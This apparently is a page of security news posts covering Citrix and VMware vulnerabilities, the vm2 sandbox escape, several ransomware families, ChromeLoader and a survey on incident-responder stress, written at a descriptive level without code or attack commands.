Citrix Gateway, A Perfect Avenue for Infesting Orgs: 

As for Citrix, a critical vulnerability tracked as CVE-2022-27510 (with a CVSS vulnerability-severity score of 9.8 out of 10) allows unauthorized access to the Citrix Gateway when device is used as SSL VPN solution. Consequently, allowing access to the internal company applications from any device through the Internet, and offering single sign-on across applications and devices. 

This way the vulnerability would give a threat actor means to easily access initial data, then dig deeper into an organization’s cloud footprint and create nuisance across the network. 

In a published advisory, Citrix also noted that its Application Delivery Controller (ADC) product, that provides admin visibility into applications across multiple cloud instances, is vulnerable to remote desktop takeover (CVE-2022-27513, CVSS 8.3), and brute force protection bypass (CVE-2022-27516, CVSS 5.3). 

According to researcher Satnam Narang, Citrix Gateway and ADC have always been a favorite target to cybercriminals, thanks to how many parts of an organization they provide entrée into. Thus, marking the importance of patching. 

"Citrix ADC and Gateways have been routinely targeted by a number of threat actors over the last few years through the exploitation of CVE-2019-19781, a critical path traversal vulnerability that was first disclosed in December 2019 and subsequently exploited beginning in January 2020 after exploit scripts for the flaw became publicly available," Narang wrote in a Wednesday blog. 

"CVE-2019-19781 has been leveraged by state-sponsored threat with ties to China and Iran, as part of ransomware attacks against various entities including the healthcare sector, and was recently included as part of an updated list of the top vulnerabilities exploited by the People’s Republic of China state-sponsored actors from early October," he added. 

Users should be quick in updating to Gateway versions 13.1-33.47, 13.0-88.12, and 12.1-65.21 to patch the latest issues. 

VMware Workspace ONE Assist, a trio of cybercrime threat: 

On the other hand, VMware has reported three authentication-bypass bugs, all in its Workspace ONE Assist for Windows. The bugs (CVE-2022-31685, CVE-2022-31686, and CVE-2022-31687, all with CVSS 9.8) allows both local and remote attackers to gain administrative access privileges without the need to authenticate, giving them full run of targeted devices. 

Workspace ONE Assist is a remote desktop product that is mainly used by tech support to troubleshoot and fix issues relating to IT, for employees from afar. As such, it operates with the highest levels of privilege, potentially giving remote attackers an ideal initial access target and pivot point to other corporate resources. 

Moreover, VMware revealed two additional vulnerabilities in Workspace ONE Assist. One is a cross-site scripting (XSS) flaw (CVE-2022-31688, CVSS 6.4), and the other (CVE-2022-31689, CVSS 4.2) that allows a "malicious actor who obtains a valid session token to authenticate to the application using that token," notes vendor’s Tuesday advisory. 

VMware as well has a history of being a target to cybercriminals. A proof-of-concept (PoC) exploit was almost immediately published on GitHub and tweeted out to the world after a major Workspace ONE Access vulnerability (used to distribute corporate apps to distant employees) identified as CVE-2022-22954 was revealed in April. 

Consequently, researchers from multiple security firms started looking for probes and exploit attempts very soon thereafter — with an ultimate motive of infecting targets with numerous or establishing a backdoor via Log4Shell. 

Online users are advised to update their Workspace ONE Assist to version 22.10 in order to patch all of the most recently disclosed problems.   

Read more »
Vulnerabilities and Exploits.
Bug Code Execution Flaw CVE Sandboxing User Privacy VMware Vulnerabilities and Exploits.

RCE Vulnerability patched in vm2 Sandbox

Researchers from Oxeye found a serious vm2 vulnerability (CVE-2022-36067) that has the highest CVSS score of 10.0. R&D executives, AppSec engineers, and security experts must make sure they rapidly repair the vm2 sandbox if they utilize it in their apps due to a new vulnerability known as SandBreak.

The most widely used Javascript sandbox library is vm2, which receives about 17.5 million downloads each month. It offers a widely used software testing framework that may synchronously execute untrusted code in a single process.

The Node.js functionality that allows vm2 maintainers to alter the call stack of failures in the software testing framework is the primary culprit in the vulnerability, which Oxeye's researchers have dubbed SandBreak.

According to senior security researcher Gal Goldshtein of Oxeye, "when examining the prior issues revealed to the vm2 maintainers, we observed an unusual technique: the bug reporter leveraged the error mechanism in Node.js to escape the sandbox."

Modern applications use sandboxes for a variety of functions, including inspecting attached files in email servers, adding an extra layer of protection in web browsers, and isolating running programs in some operating systems. Bypassing the vm2 sandbox environment, a hacker who takes advantage of this vulnerability would be able to execute shell commands on the computer hosting it.

The vm2 vulnerability can still have serious repercussions for apps that use vm2 without a fix due to the nature of the use cases for sandboxes. Given that this vulnerability does have the highest CVSS score and is quite well-known, its potential impact is both significant and extensive.

Nevertheless, an attacker might offer its alternative implementation of the prepareStackTrace technique and escape the sandbox because it did not cover all particular methods.

The researchers at Oxeye also were able to substitute their own implementation, which contained a unique prepareStackTrace function for the global Error object. When it was called, it would discover a CallSite object outside the sandbox, enabling the host to run any code.

Users are advised to upgrade as quickly as possible to the most recent version due to the vulnerability's serious severity and to reduce potential risks.


Read more »
VMware
Cyber Attacks IBM Security IBM Survey Malware. VMware

Responding to Cyberattacks Within 72 Hours is Essential to Taming the Chaos

 


Despite the widespread lack of breach preparedness and adequate incident response practices in organizations, cybersecurity professionals who are tasked with responding to attacks experience stress, burnout, and mental health issues which are aggravated by a lack of breach preparedness and inadequate incident response practices.

IBM Security has sponsored a study this week that has found that two-thirds (67%) of incident responders experience stress and anxiety at least sometimes during their engagements. In response to the Morning Consult survey conducted by Morning Consult, 44% of those surveyed sacrificed their relationships for their well-being and 42% suffer burnout. According to the survey, 68% of incident responders have been operating two or more incidents at the same time. This results in them being stressed every time they are working on incidents, according to the survey results.

In an organization where incident responders, employees, and executives of the company face a wide range of incidents, such as a fire, an explosion, or a major event, John Dwyer, head of IBM Security's X-Force response team, says that organizing and practicing how to handle such incidents can reduce the level of stress amongst incident responders, employees, and executives.

Organizers are failing to effectively establish their response strategies that are geared toward responding to emergencies with the responders in mind - "the response process does not have to be as stressful as it is today," he stressed. Responders often have to handle organizations during an incident. This is because these organizations are not prepared for the crisis that occurs when these kinds of attacks happen every single day. Therefore, the responders are usually responsible for managing those organizations.

The IBM Security-funded study underscores why cybersecurity organizations are increasingly focusing on the mental health of their members. About half (51%) of cybersecurity defenders have suffered burnout or extreme stress in the past year, according to a VMware survey released in August 2021. According to cybersecurity executives, the threat of an attack affecting the community and companies' ability to retain skilled workers can have a significant impact.

A study sponsored by IBM Security provides support for why the cybersecurity community has been focusing increasingly on the mental health of its members as the field has evolved. It has been reported that about half of cybersecurity defenders have suffered burnout or extreme stress during the past year. This is according to a VMware survey released in August 2021 which surveyed 3,000 cybersecurity professionals. The issue of cybersecurity retention has also been highlighted by executives in the security field as one that impacts the whole community. This impacts providers' ability to attract and retain skilled workers.

Based on findings from the IBM survey of incident responders based in the US, it was found that 62% sought mental health assistance as a result of doing their job, but that 82% of US employers had put in place an adequate program and services to handle this situation.

"I've worked on some really big incidents in the past with clients who were very prepared, and I found that to be a very satisfying experience to do so," explains Dwyer about what he has done in the past. During the past few years, several incidents have occurred when the incident response processes of the company lacked the readiness to deal with these situations, which caused me to have to deal with a great deal of stress during these times."

The survey found that incident response professionals have three main reasons for choosing the profession, which may explain their decision to pursue it. A study by the American Management Association found that 36 percent of respondents indicated their motivation for joining the company was a sense of duty of protection. In addition, 19% said they were interested in solving problems. Furthermore, 19% said they joined because they wanted continuous learning opportunities.

As a result of the survey, half of those surveyed cited managing expectations from multiple stakeholders as a top-three stressor, and 48% cited their sense of responsibility toward their client or business as another top-three stressor. According to the survey, one of the most striking findings is that incident responders are very dedicated to their roles, with almost one-third (34%) working 13 or more hours a day in the most stressful periods of the incident response process, which in turn strengthens the dedication to their jobs.

According to Dwyer, the general public does not seem to realize how long these men and women are working to ensure that people's lives and businesses are not disrupted because they work long hours.
Read more »
Vmware vulnerability
Chrome Malicious Campaign malware Malware Campaign VMware Vmware vulnerability

ChromeLoader: Microsoft, VMware Warns of the New Malware Campaigns

 

Microsoft and VMware are warning about the ongoing widespread malware campaign of ChromeLoader, which led to an “ongoing wide-ranging click frauds” later this year. 

The malware tool named ChromeLoader is apparently hijacking the browsers to redirect users to ad pages. The software has now evolved into a potential threat by deploying more potent payloads that go beyond malvertising. Variants of ChromeLoader have been dropping malicious browser extensions, node WebKit malware, and even ransomware on Windows PCs and Macs. 

Functioning of ChromeLoader 

Microsoft detected an ongoing widespread campaign of click frauds and attributed it to a threat actor DEV-0796. The malware attack begins with an ISO file that is downloaded when the user clicks a malicious ad, browser redirects, or Youtube comment. The attackers seek to profit from clicks generated by malicious browser extensions or node-WebKit that they have installed on the victim’s device, without being detected.  

The researchers from VMware’s Carbon Black Managed Detection and Response (MDR) team said they have seen the malware’s operators impersonating various legitimate services that would lead users to ChromeLoader. The researchers observed hundreds of attacks that included variants of the malware, targeting multiples sectors such as education, government, healthcare, and enterprises in business services. 

“This campaign has gone through many changes over the past few months, and we don’t expect it to stop [...] It is imperative that these industries take note of the prevalence of this threat and prepare to respond to it” warns the researchers. 

Rapid Evolution Of Malware

Earlier, the malware infected Chrome with a malicious extension that redirected the user traffic to advertising sites performing click frauds and generating income for the threat actors. “But, it later evolved into an ‘info-stealer’, stealing sensitive data stored in browsers and deploying zip bombs (i.e. malicious archive files) to crash systems, while still retaining its adware function,” said researchers, in an advisory released on September 19. 

Since Adware does not cause any significant damage to a victim’s software, the threat is not taken seriously by analysts. However, any software, such as ChromeLoader, that could enter a system undetected, is an immediate threat to a user, as the victim may as well apply modifications, facilitating monetization options for the malware. 

“The Carbon Black MDR team believes that this is an emerging threat that needs to be tracked and taken seriously [...] due to its potential for delivering more nefarious malware,” VMware said in the advisory. 
Read more »
VMware
Cyber Secuirty Cyber Security Darknet Double extortion Linux Ransomware Attacks. Russian Hacker VMware

ESXi , Linux, and Windows Systems at Risk From New Luna Ransomware

Luna is a brand-new ransomware family that was written in Rust, making it the third strain to do so after BlackCat and Hive, according to Kaspersky security researchers

The experts who examined the ransomware's command-line options believe that Luna is a reasonably straightforward ransomware program. 

Luna ransomware

This interesting encryption method combines x25519 with AES. The researchers discovered that the Linux and ESXi samples, which are compiled using the identical source code, differ only slightly from the Windows version.

Darknet forum advertisements for Luna imply that the ransomware is only meant to be used by affiliates who speak Russian. Due to spelling errors in the ransom note that are hard-coded into the malware, its main creators are also thought to be of Russian descent.

The Luna ransomware is also able to avoid automated static code analysis attempts by utilizing a cross-platform language.

"The source code used to compile the Windows version and the Linux and ESXi samples are identical. The remaining code is almost unchanged from the Windows version" the researchers added. Luna "confirms the trend for cross-platform ransomware," the researchers wrote, pointing out how hackers are able to target and strike at scale while avoiding static analysis, thanks to the platform flexibility of languages like Golang and Rust.

Nevertheless, considering that Luna is a recently identified criminal organization and its activities are still being constantly monitored, there is very little knowledge available regarding the victimology trends.

Black Basta

Researchers have also revealed information about the Black Basta ransomware group, which modified its software to target ESXi systems. By adding compatibility for VMware ESXi, various ransomware families, including LockBit, HelloKitty, BlackMatter, and REvil, hope to increase their potential targets.

The double-extortion attack model is used by Black Basta, a ransomware operation that has been operational since April 2022.

Researchers from Kaspersky said that operators had introduced a new feature that relies on launching the computer in safe mode before encrypting data and imitating Windows Services in order to maintain persistence.

Black Basta can avoid detection from a variety of endpoint security solutions by starting Windows in safe mode.




Read more »
VMware
Linux malware Ransomware RedAlert VMware

This New RedAlert Ransomware Targets Windows, Linux VMware ESXi Servers

 

RedAlert (aka N13V), a new ransomware threat that encrypts both Windows and Linux VMWare ESXi systems, has been discovered. Concerning the RedAlert ransomware, MalwareHunterTeam uncovered the new ransomware and published various screenshots of its data leak site. Because of a string in the ransom text, the ransomware is known as RedAlert. 

However, the attackers are internally referring to their operation as N13V in the Linux encrypter version. The Linux encryptor is intended for use on VMware ESXi servers, including command-line options that enable attackers to shut down any operating virtual machines before locking data. 

RedAlert, like other enterprise-targeted ransomware operations, conducts double-extortion attacks in which data is taken and then ransomware is used to encrypt machines. The ransomware exclusively targets VMware ESXi virtual machine data, such as memory files, log files, virtual discs, and swap files. 

The ransomware encrypts certain file formats and appends the extension.crypt658 to the file names. The ransomware produces a specific ransom note entitled HOW TO RESTORE in each folder, which includes a description of the stolen data and a link to a TOR ransom payment site. One of RedAlert/features N13V's is the '-x' command-line option, which performs asymmetric cryptography performance testing with various NTRUEncrypt parameter sets. 

During encryption, the ransomware employs the NTRUEncrypt public-key encryption method, which supports several 'Parameter Sets' with varying degrees of protection. Aside from RedAlert, the only other ransomware known to use this form of encryption is FiveHands.  

RedAlert currently lists only one organisation as a victim, however, this may change in the near future. Furthermore, the malware's compatibility for both Windows and Linux shows that it intends to target a broader attack surface. As a result, enterprises should keep an eye on this threat. Always use encryption and access controls to safeguard critical information.
Read more »
VMware
Cyberattack data wipers Google Honeypot Installation IBM Malicious actor malware python RaaS Ransomware Attacks. VMware

JupyterLab Web Notebooks Targeted by Unique Python-Based Ransomware

 

The first-ever Python-based ransomware virus specifically tailored to target vulnerable Jupyter notebooks has been revealed by researchers. It is a web-based immersive computing platform which allows editing and running programs via a browser. Python isn't widely used for malware development, instead, notably, thieves prefer languages like Go, DLang, Nim, and Rust. Nonetheless, this isn't the first time Python has been used in a ransomware attack. Sophos disclosed Python ransomware, particularly targeting VMware ESXi systems in October 2021. 

Jupyter Notebook is a web-based data visualization platform that is open source. In data science, computers, machine learning, and modular software are used to model data. Over 40 programming languages are supported by the project, which is used by Microsoft, IBM, and Google, as well as other universities. According to Assaf Morag, a data analyst at Aqua Security, "the attackers got early access via misconfigured environments, then executed a ransomware script it encrypts every file on a particular path on the server and eliminates itself after execution to disguise the operation." 

The Python ransomware is aimed at those who have unintentionally made one's systems susceptible. To watch the malware's activities, the researchers set up a honeypot with an exposed Jupyter notebook application. The ransomware operator logged in to the server, opened a terminal, downloaded a set of malicious tools, including encryptors, and then manually generated a Python script. While the assault came to a halt before completing the mission, Team Nautilus was able to gather enough data to mimic the remainder of the attack in a lab setting. The encryptor would replicate and encrypt files, then remove any unencrypted data before deleting itself. 

"There are over 11,000 servers with Jupyter Notebooks which are internet-facing," Aqua researcher Assaf Morag stated. "Users can execute a brute force attack and perhaps obtain access to some of them — one would be amazed how easy it can be to predict these passwords." We believe the attack either timed out on the honeypot or the ransomware is still being evaluated before being used in real-world attacks." Unlike other conventional ransomware-as-a-service (RaaS) schemes, Aqua Security described the attack as "simple and straightforward," adding since no ransom note was displayed on the process, raising the possibility the threat actor was experimenting with the modus operandi or the honeypot scheduled out before it could be completed. 

Regardless, the researchers believe it is ransomware rather than a wiper weapon based on what they have. "Wipers typically exfiltrate data and delete it or simply wipe it," Morag continued. "We haven't observed any attempts to move the data outside the server, and the data wasn't just erased, it was encrypted with a password," says the researcher. This is even additional evidence this is a ransomware attack instead of a wiper."

Although evidence discovered during the incident study leads to a Russian actor, citing similarities with prior crypto mining assaults focused on Jupyter notebooks, the attacker's identity remains unknown.
Read more »
Vulnerabilities and Exploits
Attack Bug Conti Conti Ransomware Flaw Log4Shell Ransomware VMware Vulnerabilities and Exploits

Conti Ransomware Exploits Log4j Flaw to Hack VMware vCenter Servers

 

The critical Log4Shell exploit is being used by the Conti ransomware operation to obtain quick access to internal VMware vCenter Server instances and encrypt virtual machines. The group wasted no time in adopting the new attack vector, becoming the first "top-tier" operation to exploit the Log4j flaw. 

On December 9, a proof-of-concept (PoC) exploit for CVE-2021-44228, also known as Log4Shell, was made public. A day later, numerous actors began scanning the internet in search of vulnerable systems. Cryptocurrency miners, botnets, and a new ransomware strain called Khonsari were among the first to leverage the flaw. 

By December 15, state-backed hackers and initial access brokers, who sell network access to ransomware gangs, had joined the list of threat actors using Log4Shell. Conti, one of today's largest and most prolific ransomware groups with tens of full-time members, seems to have developed an early interest in Log4Shell, viewing it as a potential attack channel on Sunday, December 12. 

The group began seeking fresh victims the next day, with the intention of lateral migration to VMware vCenter networks, as per Advanced Intelligence (AdvIntel), a cybercrime and hostile disruption firm. Log4Shell has impacted dozens of vendors, who have rushed to patch their products or provide workarounds and mitigations for customers. VMware is one among them, with 40 products listed as vulnerable. 

While the firm has suggested mitigations or fixes, a patch for the affected vCenter versions has yet to be released. Although vCenter servers are not generally accessible to the internet, there are a few scenarios in which an attacker may exploit the flaw.

“A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system and/or perform a denial of service attack” – Vmware 

Log4Shell to move laterally 

"This is the first time this vulnerability entered the radar of a major ransomware group," according to a report shared with BleepingComputer. 

“The current exploitation led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4J exploit” - AdvIntel 

While most defenders are aimed at stopping Log4Shell attacks on Internet-connected devices, the Conti ransomware operation demonstrates how the vulnerability can be leveraged to attack internal systems that aren't as well-protected. 

Conti ransomware affiliates had already invaded the target networks and exploited vulnerable Log4j machines to obtain access to vCenter servers, according to the researchers. This indicates that Conti ransomware members used a different initial access vector to infect a network (RDP, VPN, email phishing) and are now utilising Log4Shell to move laterally on the network. 

Conti, the successor to the notorious Ryuk ransomware, is a Russian-speaking group that has been in the ransomware business for a long time. Hundreds of attacks have been carried out by the group, with its data leak site alone reporting over 600 victim firms who did not pay a ransom. Other firms who paid the actor to have their data decrypted are also included. The group has extorted more than $150 million from its victims in the last six months, according to AdvIntel.
Read more »
Subscribe to: Posts (Atom)